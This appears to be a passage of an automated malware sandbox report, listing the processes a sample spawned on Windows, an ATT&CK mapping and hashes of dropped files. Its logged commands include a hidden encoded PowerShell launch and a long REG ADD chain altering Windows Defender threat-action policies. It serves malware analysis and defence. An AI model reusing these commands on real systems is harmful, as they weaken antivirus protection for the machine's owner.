"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --enable-logging --headless --log-level=0 --use-angle=swiftshader-webgl --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:57.0) Gecko/20100101 Firefox/57.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --enable-logging --log-level=0 --mojo-platform-channel-handle=1412 --field-trial-handle=1516,i,12623157350074787576,16850448850828122232,131072 --disable-features=PaintHolding /prefetch:2
9⤵
- Executes dropped EXE
PID:5976

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=de --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:57.0) Gecko/20100101 Firefox/57.0" --enable-logging --log-level=0 --mojo-platform-channel-handle=1580 --field-trial-handle=1516,i,12623157350074787576,16850448850828122232,131072 --disable-features=PaintHolding /prefetch:8
9⤵
- Executes dropped EXE
PID:2692

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:57.0) Gecko/20100101 Firefox/57.0" --lang=de --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9631 --test-type=webdriver --allow-pre-commit-input --enable-blink-features=ShadowDOMV0 --lang=de --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1968 --field-trial-handle=1516,i,12623157350074787576,16850448850828122232,131072 --disable-features=PaintHolding /prefetch:1
9⤵
- Checks computer location settings
- Executes dropped EXE
PID:1556

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=renderer --headless --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:57.0) Gecko/20100101 Firefox/57.0" --lang=de --no-sandbox --enable-automation --enable-logging --log-level=0 --remote-debugging-port=9631 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --lang=de --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2688 --field-trial-handle=1516,i,12623157350074787576,16850448850828122232,131072 --disable-features=PaintHolding /prefetch:1
9⤵
- Checks computer location settings
- Executes dropped EXE
PID:6008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2216
4⤵
- Program crash
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2164
4⤵
- Program crash
PID:4788

C:\Users\Admin\AppData\Local\Temp\2xYbZE7r\T4gizA.exe
C:\Users\Admin\AppData\Local\Temp\2xYbZE7r\T4gizA.exe
4⤵
- Executes dropped EXE
PID:724

C:\Users\Admin\AppData\Local\Temp\is-30AJO.tmp\is-RBHF8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-30AJO.tmp\is-RBHF8.tmp" /SL4 $202CC "C:\Users\Admin\AppData\Local\Temp\2xYbZE7r\T4gizA.exe" 1958099 48640
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1972

C:\Program Files (x86)\BWngBackup\SyncBackupShell.exe
"C:\Program Files (x86)\BWngBackup\SyncBackupShell.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1900
4⤵
- Program crash
PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2164
4⤵
- Program crash
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1896
4⤵
- Program crash
PID:5404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1900
4⤵
- Program crash
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1988
4⤵
- Program crash
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1900
4⤵
- Program crash
PID:5840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1796
4⤵
- Program crash
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1816
4⤵
- Program crash
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2044
4⤵
- Program crash
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2224
4⤵
- Program crash
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2236
4⤵
- Program crash
PID:1164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1268
4⤵
- Program crash
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2116
4⤵
- Program crash
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1724
4⤵
- Program crash
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1980
4⤵
- Program crash
PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1788
4⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2184
4⤵
- Program crash
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2124
4⤵
- Program crash
PID:2360

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause ImageComparer45
3⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause ImageComparer45
4⤵
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2116 -ip 2116
1⤵
PID:1684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2116 -ip 2116
1⤵
PID:848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2116 -ip 2116
1⤵
PID:928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5028 -ip 5028
1⤵
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5028 -ip 5028
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5028 -ip 5028
1⤵
PID:2620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5028 -ip 5028
1⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5028 -ip 5028
1⤵
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5028 -ip 5028
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5028 -ip 5028
1⤵
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5028 -ip 5028
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5028 -ip 5028
1⤵
PID:932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5028 -ip 5028
1⤵
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5028 -ip 5028
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5028 -ip 5028
1⤵
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5028 -ip 5028
1⤵
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5028 -ip 5028
1⤵
PID:1684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5028 -ip 5028
1⤵
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5028 -ip 5028
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5028 -ip 5028
1⤵
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5028 -ip 5028
1⤵
PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5028 -ip 5028
1⤵
PID:388

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5028 -ip 5028
1⤵
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5028 -ip 5028
1⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5028 -ip 5028
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5028 -ip 5028
1⤵
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5028 -ip 5028
1⤵
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5028 -ip 5028
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5028 -ip 5028
1⤵
PID:1056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5028 -ip 5028
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5028 -ip 5028
1⤵
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5028 -ip 5028
1⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5028 -ip 5028
1⤵
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5028 -ip 5028
1⤵
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5028 -ip 5028
1⤵
PID:5300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5028 -ip 5028
1⤵
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5028 -ip 5028
1⤵
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5028 -ip 5028
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5028 -ip 5028
1⤵
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5028 -ip 5028
1⤵
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5028 -ip 5028
1⤵
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5028 -ip 5028
1⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5028 -ip 5028
1⤵
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5028 -ip 5028
1⤵
PID:5996

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5028 -ip 5028
1⤵
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5028 -ip 5028
1⤵
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5028 -ip 5028
1⤵
PID:5556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5028 -ip 5028
1⤵
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5028 -ip 5028
1⤵
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5028 -ip 5028
1⤵
PID:2000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5028 -ip 5028
1⤵
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5028 -ip 5028
1⤵
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5028 -ip 5028
1⤵
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5028 -ip 5028
1⤵
PID:980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5028 -ip 5028
1⤵
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5028 -ip 5028
1⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5028 -ip 5028
1⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\ihxsYbJcjJsUJBARi\QuPsafdaRiDniKs\cHHeNEL.exe
C:\Users\Admin\AppData\Local\Temp\ihxsYbJcjJsUJBARi\QuPsafdaRiDniKs\cHHeNEL.exe bt /site_id 690689 /S
1⤵
- Executes dropped EXE
PID:960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4044

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:5744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:5552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:5588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:2788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:5696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:5740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:6128

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Security Software Discovery

T1063

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\CRDBH\CR_DBF.exe
Filesize
4.9MB

MD5
8894b7c42a3dcf29f99ba9be2e03b6f9

SHA1
98ebba7c44ab8951f307ed244a6564f6ba97afd1

SHA256
16fc2dc1bd196103421b0d65771c4b2a78fdd8cb64ad2d5677a595c36447d2f5

SHA512
ed6dbd5f64575eddf0e45e6f0da36190d3e705eed84b7bf9d39dd6b1b4286d9f9b4f8a2396d152b35afb6e2a9abfc9a254c7b9c59fedc0de43c4aa55f302fab0

Download Submit
C:\Program Files (x86)\CRDBH\CR_DBF.exe
Filesize
4.9MB

MD5
8894b7c42a3dcf29f99ba9be2e03b6f9

SHA1
98ebba7c44ab8951f307ed244a6564f6ba97afd1

SHA256
16fc2dc1bd196103421b0d65771c4b2a78fdd8cb64ad2d5677a595c36447d2f5

SHA512
ed6dbd5f64575eddf0e45e6f0da36190d3e705eed84b7bf9d39dd6b1b4286d9f9b4f8a2396d152b35afb6e2a9abfc9a254c7b9c59fedc0de43c4aa55f302fab0

Download Submit
C:\Program Files (x86)\CRDBH\RepairDbf.ini
Filesize
25KB

MD5
2955b8650e0bb762a51d7a1c16002ef3

SHA1
c0af92b949ee07b47ea13cdabaacc0170413dc3b

SHA256
b0d7527bff28f6ec2007036afeecfedcbe92118f65bd34478e11c7d2e5c6b5e5

SHA512
13166359b2a7e2f296fb6a3e873bbf4d779669ccaaf1558321393a92f46395dfca8ce8c35c39944c005eb1ad9ec993ae295555a334df612373d33654bd0a2128

Download Submit
C:\Program Files (x86)\CRDBH\RepairDbf.ini
Filesize
25KB

MD5
86b2261e438bf13c302dd625ab9fd369

SHA1
955075956e06c462eb121f122e2a7fe99ea7d799

SHA256
29674c7e228af7f14634eb625b650316d7c961506648c019d0a66451646a772e

SHA512
281660f905f02364ddefe8b634fe8fbd2040bee7c39ae6a2590fd0f807cd058459d1bc79b459b8c055952a445690d02b48d05d4e43e0d2e9cee9327cef3d46a4

Download Submit
C:\Program Files (x86)\Erkalo 4.6\Erkalo46.exe
Filesize
4.6MB

MD5
b8c86236d64c42dc597bb374faf4481c

SHA1
524d99ae9e2c4b4abe360fa4e29807d95f99e5ef

SHA256
59657d63b310ec12fd22c96f03a4cfef255f607af2668759b42db556239d9779

SHA512
1a27f1e4de8de2c15eff7122e02b1598a4f0841960b6001a5a5cf7ca1861a9325fd47b6d51cc539b26cd6811b608c8ead010bc7ac4a5c7c6924f252864a3cd5c

Download Submit
